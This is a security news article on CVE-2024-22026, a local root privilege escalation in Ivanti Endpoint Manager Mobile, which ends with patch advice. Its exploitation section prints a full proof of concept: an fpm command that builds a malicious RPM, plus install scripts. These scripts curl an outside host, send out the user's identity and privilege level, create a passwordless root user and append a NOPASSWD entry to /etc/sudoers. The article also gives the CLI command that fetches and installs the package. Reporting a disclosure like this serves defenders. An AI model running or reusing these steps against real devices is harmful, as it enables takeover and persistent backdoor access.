A newly disclosed vulnerability, CVE-2024-22026, has been found in Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core.
This vulnerability allows a local attacker to gain root access to affected systems.
The severity of this vulnerability is currently undetermined.
CVE-2024-22026: Local Privilege Escalation Vulnerability
The attack vector for CVE-2024-22026 is local, meaning the attacker must have local access to the system to exploit the vulnerability, as per reports by Github.
Once exploited, the attacker can gain root access, which provides full control over the system and can potentially lead to significant security breaches.
Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers
Discovery
The device uses the following command as a low-privilege user to get and install RPM packages:
install rpm url This command is a CLI wrapper for the following to occur, which runs as root:
/bin/rpm -Uvh *.rpmIt’s possible to run any RPM package because the RPM command itself doesn’t check signatures or block URLs. An attacker can create a fake RPM package and send it to the device, making it vulnerable.
Exploitation PoCCreating the Malicious RPM
The following command is used to create a malicious RPM package:
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .Preinstall Script (preinstall.sh)
#!/bin/sh
curl -O http:///poc
exit 0
Postinstall Script (postinstall.sh)
#!/bin/sh
set -e # Enable strict error checking
# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http:///poc?user=$CURRENT_USER
curl http:///poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
echo "Failed to add user 'exploit-poc'" >&2
exit 1
fi
echo "exploit-poc:" | chpasswd
# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
echo "Failed to modify sudoers file" >&2
exit 1
fi
exit 0
Running the CLI Command to Fetch the RPM: To take advantage of the flaw, the attacker would use the code below in the CLI to get the malicious RPM and install it:
install rpm url http:///ivanti-privesc-13.37-1.i386.rpm
Ivanti has released patches to address this vulnerability in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.
It is strongly recommended that users update these versions to mitigate the risk associated with CVE-2024-22026.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free